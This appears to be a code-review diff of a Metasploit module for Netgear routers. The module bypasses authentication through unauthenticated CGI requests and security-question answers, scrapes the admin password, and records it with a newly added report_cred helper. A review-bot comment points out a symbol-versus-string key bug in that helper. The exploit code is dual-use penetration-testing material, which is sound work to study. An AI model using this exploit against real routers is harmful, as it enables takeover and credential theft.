made changes suggested
parent
9d3e90e8e5
commit
d95a3ff2ac
|
@ -96,31 +96,31 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
# 1: send serial number
|
# 1: send serial number
|
||||||
res = send_request_cgi({
|
send_request_cgi({
|
||||||
'uri' => '/apply_noauth.cgi?/unauth.cgi',
|
'uri' => '/apply_noauth.cgi?/unauth.cgi',
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'Content-Type' => 'application/x-www-form-urlencoded',
|
'Content-Type' => 'application/x-www-form-urlencoded',
|
||||||
'vars_post' =>
|
'vars_post' =>
|
||||||
{
|
{
|
||||||
'submit_flag' => 'match_sn',
|
'submit_flag' => 'match_sn',
|
||||||
'serial_num' => serial,
|
'serial_num' => serial,
|
||||||
'continue' => '+Continue+'
|
'continue' => '+Continue+'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
# 2: send answer to secret questions
|
# 2: send answer to secret questions
|
||||||
res = send_request_cgi({
|
send_request_cgi({
|
||||||
'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
|
'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'Content-Type' => 'application/x-www-form-urlencoded',
|
'Content-Type' => 'application/x-www-form-urlencoded',
|
||||||
'vars_post' =>
|
'vars_post' =>
|
||||||
{
|
{
|
||||||
'submit_flag' => 'security_question',
|
'submit_flag' => 'security_question',
|
||||||
'answer1' => @q1,
|
'answer1' => @q1,
|
||||||
'answer2' => @q2,
|
'answer2' => @q2,
|
||||||
'continue' => '+Continue+'
|
'continue' => '+Continue+'
|
||||||
}
|
}
|
||||||
})
|
})
|
||||||
|
|
||||||
# 3: PROFIT!!!
|
# 3: PROFIT!!!
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
|
@ -130,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
if res && res.body =~ /Admin Password: (.*)<\/TD>/
|
if res && res.body =~ /Admin Password: (.*)<\/TD>/
|
||||||
password = $1
|
password = $1
|
||||||
if password.nil? or password == ""
|
if password.blank?
|
||||||
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
|
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
|
@ -145,6 +145,33 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
return [username, password]
|
return [username, password]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def report_cred(opts)
|
||||||
|
service_data = {
|
||||||
|
address: opts[:ip],
|
||||||
|
port: opts[:port],
|
||||||
|
service_name: 'netgear',
|
||||||
|
protocol: 'tcp',
|
||||||
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data = {
|
||||||
|
origin_type: :service,
|
||||||
|
module_fullname: fullname,
|
||||||
|
username: opts[:user],
|
||||||
|
private_data: opts[:password],
|
||||||
|
private_type: :password
|
||||||
|
}.merge(service_data)
|
||||||
|
|
||||||
|
login_data = {
|
||||||
|
last_attempted_at: DateTime.now,
|
||||||
|
core: create_credential(credential_data),
|
||||||
|
status: Metasploit::Model::Login::Status::SUCCESSFUL,
|
||||||
|
proof: opts[:proof]
|
||||||
|
}.merge(service_data)
|
||||||
|
|
||||||
|
create_credential_login(login_data)
|
||||||
|
end
|
||||||
|
|
||||||
def send_req(timestamp)
|
def send_req(timestamp)
|
||||||
begin
|
begin
|
||||||
|
@ -211,6 +238,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
if res && res.code == 200
|
if res && res.code == 200
|
||||||
credentials = get_creds
|
credentials = get_creds
|
||||||
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
|
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
|
||||||
|
report_cred({ 'user' => credentials[0], 'password' => credentials[1] })
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
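Review bot: The added call `report_cred({ 'user' => credentials[0], 'password' => credentials[1] })` passes string keys, but the new `report_cred` helper reads `opts[:ip]`, `opts[:port]`, `opts[:user]`, `opts[:password]` and `opts[:proof]`. Every one of those lookups therefore returns nil, so the credential is handed to `create_credential` without a username, password, address or port. The call also never supplies the host, port or proof that the helper expects. Use symbol keys and pass all five values, e.g. `report_cred(ip: rhost, port: rport, user: credentials[0], password: credentials[1], proof: res.body)`, assuming `rhost` and `rport` are available in this module as they are in other HTTP client modules. The method containing the call starts outside the hunk.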
|
@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# no shell? let's just go on and bruteforce the timestamp
|
# no shell? let's just go on and bruteforce the timestamp
|
||||||
# 3: get the current date from the router and parse it
|
# 3: get the current date from the router and parse it
|
||||||
end_time = get_current_time
|
end_time = get_current_time
|
||||||
if end_time == nil
|
if end_time.nil?
|
||||||
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
|
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
|
||||||
end
|
end
|
||||||
if end_time <= datastore['TIME_OFFSET']
|
if end_time <= datastore['TIME_OFFSET']
|
||||||
|
|